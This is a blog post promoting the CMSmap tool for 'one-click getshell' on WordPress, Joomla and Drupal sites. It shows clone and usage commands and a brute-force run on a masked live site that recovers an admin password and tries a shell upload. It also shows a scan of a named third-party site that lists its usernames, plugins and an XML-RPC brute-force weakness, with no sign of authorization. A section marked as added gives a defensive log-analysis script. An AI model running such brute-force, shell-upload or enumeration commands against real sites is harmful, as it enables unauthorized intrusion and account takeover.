CMSmap penetration testing tool

暗月博客, 2019-11-21 21:28:43
I won't spend much time introducing CMSmap; all I'll tell you is that it can get a shell on WordPress, Joomla and Drupal in one click.

Download and use

➜  soft  git clone https://github.com/Dionach/CMSmap.git
➜  CMSmap git:(master) python cmsmap.py
CMSmap tool v0.6 - Simple CMS Scanner
Author: Mike Manzotti [email protected]
Usage: cmsmap.py -t <URL>
Targets:
     -t, --target    target URL (e.g. 'https://example.com:8080/')
     -f, --force     force scan (W)ordpress, (J)oomla or (D)rupal
     -F, --fullscan  full scan using large plugin lists. False positives and slow!
     -a, --agent     set custom user-agent
     -T, --threads   number of threads (Default: 5)
     -i, --input     scan multiple targets listed in a given text file
     -o, --output    save output in a file
     --noedb         enumerate plugins without searching exploits

Brute-Force:
     -u, --usr       username or file
     -p, --psw       password or file
     --noxmlrpc      brute forcing WordPress without XML-RPC

Post Exploitation:
     -k, --crack     password hashes file (Require hashcat installed. For WordPress and Joomla only)
     -w, --wordlist  wordlist file

Others:
     -v, --verbose   verbose mode (Default: false)
     -U, --update    (C)MSmap, (W)ordpress plugins and themes, (J)oomla components, (D)rupal modules, (A)ll
     -h, --help      show this help

Examples:
     cmsmap.py -t https://example.com
     cmsmap.py -t https://example.com -f W -F --noedb
     cmsmap.py -t https://example.com -i targets.txt -o output.txt
     cmsmap.py -t https://example.com -u admin -p passwords.txt
     cmsmap.py -k hashes.txt -w passwords.txt

As the usage text above shows, the tool supports multi-threaded brute forcing.

Trying it out

To protect privacy, I have masked the target.

➜  CMSmap git:(master) ✗ python cmsmap.py -t http://www.****.org/ -u admin -p pass.txt
[-] Date & Time: 15/06/2015 22:36:24
[-] Wordpress Brute Forcing Attack Started
[H] Valid Credentials: admin qwerasdf
[H] Valid credentials: admin qwerasdf . Do you want to try uploading a shell?
[-] (If you are not admin, you won't be able to) [y/N]: y
[-] Logging in to the target website as admin:qwerasdf
[ERROR] Unable to upload a shell. Probably you are not an admin.
[-] Date & Time: 15/06/2015 22:38:59
[-] Completed in: 0:02:35

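As you can see, in this case the brute force succeeded but getting a shell did not, because the account does not have administrator privileges.

Fingerprint scan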

➜  CMSmap git:(master) ✗ python cmsmap.py -t http://www.jobbole.com/ -f W
[-] Date & Time: 15/06/2015 22:58:30
[-] Target: http://www.jobbole.com
[M] Website Not in HTTPS: http://www.jobbole.com
[I] Server: nginx
[I] X-Powered-By: PHP/5.3.3
[L] X-Frame-Options: Not Enforced
[I] Strict-Transport-Security: Not Enforced
[I] X-Content-Security-Policy: Not Enforced
[I] X-Content-Type-Options: Not Enforced
[L] Robots.txt Found: http://www.jobbole.com/robots.txt
[I] CMS Detection: Wordpress
[I] Wordpress Theme: jobboleblogv3
[-] Enumerating Wordpress Usernames via "Feed" ...
[-] Enumerating Wordpress Usernames via "Author" ...
[M] 10
[M] 11
[M] 12
[M] 13
[M] 14
[M] 16
[M] 17
[M] 18
[M] 19
[M] 4
[M] 9
[M] Carey
[M] HelloKitty
[M] Spokesman
[M] admin
[M] jobbole
[M] Website vulnerable to XML-RPC Brute Force Vulnerability
[I] Autocomplete Off Not Found: http://www.jobbole.com/wp-login.php
[-] Default WordPress Files:
[I] http://www.jobbole.com/readme.html
[I] http://www.jobbole.com/license.txt
[I] http://www.jobbole.com/xmlrpc.php
[I] http://www.jobbole.com/wp-includes/images/crystal/license.txt
[I] http://www.jobbole.com/wp-includes/images/crystal/license.txt
[I] http://www.jobbole.com/wp-includes/js/plupload/license.txt
[I] http://www.jobbole.com/wp-includes/js/plupload/changelog.txt
[I] http://www.jobbole.com/wp-includes/js/tinymce/license.txt
[I] http://www.jobbole.com/wp-includes/js/tinymce/plugins/spellchecker/changelog.txt
[I] http://www.jobbole.com/wp-includes/js/swfupload/license.txt
[-] Searching Wordpress Plugins ...
[I] jobbole-wp-plugin
[I] mu-widgets
[I] q2w3-fixed-widget
[I] wp-connect
[I] wp-postviews
[I] akismet
[I] bbpress
[I] comment-rating
[I] login-lockdown
[I] ucan-post
[-] Searching Wordpress TimThumbs ... 6%
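
A defender-side view of the two behaviours in the output above (the brute-force run against the login endpoints and the "Author" username enumeration), as an added example that is not part of the original post or of CMSmap: a log check that flags clients sending repeated POSTs to /xmlrpc.php or /wp-login.php, or sweeping author IDs. The combined log format, the `?author=N` request shape, the thresholds and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import Counter, defaultdict

# Assumed combined log format: ip ident user [time] "METHOD URL PROTO" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
AUTHOR = re.compile(r'[?&]author=(\d+)')          # assumed enumeration request shape
LOGIN_PATHS = ("/xmlrpc.php", "/wp-login.php")    # endpoints named in the scan output

def analyze(lines, login_threshold=5, author_threshold=5):
    """Return {ip: [findings]} for login POST floods and author-ID sweeps."""
    posts = Counter()             # (ip, path) -> number of POSTs
    authors = defaultdict(set)    # ip -> distinct author IDs requested
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue              # ignore lines that are not in the assumed format
        ip, method, url, _status = m.groups()
        path = url.split("?", 1)[0]
        if method == "POST" and path in LOGIN_PATHS:
            posts[(ip, path)] += 1
        hit = AUTHOR.search(url)
        if method == "GET" and hit:
            authors[ip].add(int(hit.group(1)))
    findings = defaultdict(list)
    for (ip, path), n in sorted(posts.items()):
        if n >= login_threshold:
            findings[ip].append(f"{n} POSTs to {path}")
    for ip, ids in sorted(authors.items()):
        if len(ids) >= author_threshold:
            findings[ip].append(f"author enumeration ({len(ids)} ids)")
    return dict(findings)

def _entry(ip, method, url, status=200):
    # Builds one constructed log line; addresses are documentation ranges.
    return (f'{ip} - - [15/Jun/2015:22:36:24 +0000] '
            f'"{method} {url} HTTP/1.1" {status} 512 "-" "-"')

# Constructed sample: one scanning client and one ordinary visitor.
SAMPLE = (
    [_entry("203.0.113.7", "GET", f"/?author={i}", 301) for i in range(1, 11)]
    + [_entry("203.0.113.7", "POST", "/xmlrpc.php") for _ in range(40)]
    + [_entry("198.51.100.20", "POST", "/wp-login.php", 302),
       _entry("198.51.100.20", "GET", "/?author=1", 301),
       _entry("198.51.100.20", "GET", "/readme.html")]
)

if __name__ == "__main__":
    for ip, notes in analyze(SAMPLE).items():
        print(ip, "->", "; ".join(notes))
```

The thresholds apply to whatever slice of the log is passed in, so feed the function a bounded time window rather than a whole archive.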

My feeling is that this flat-out beats wpscan; it is very powerful.

Source: http://www.codefrom.com/paper/%E7%A7%92%E6%9D%80wpscan%EF%BC%81wordpress%E4%B8%80%E9%94%AEgetshell

Git download

https://github.com/BrianHeeseIs/CMSmap
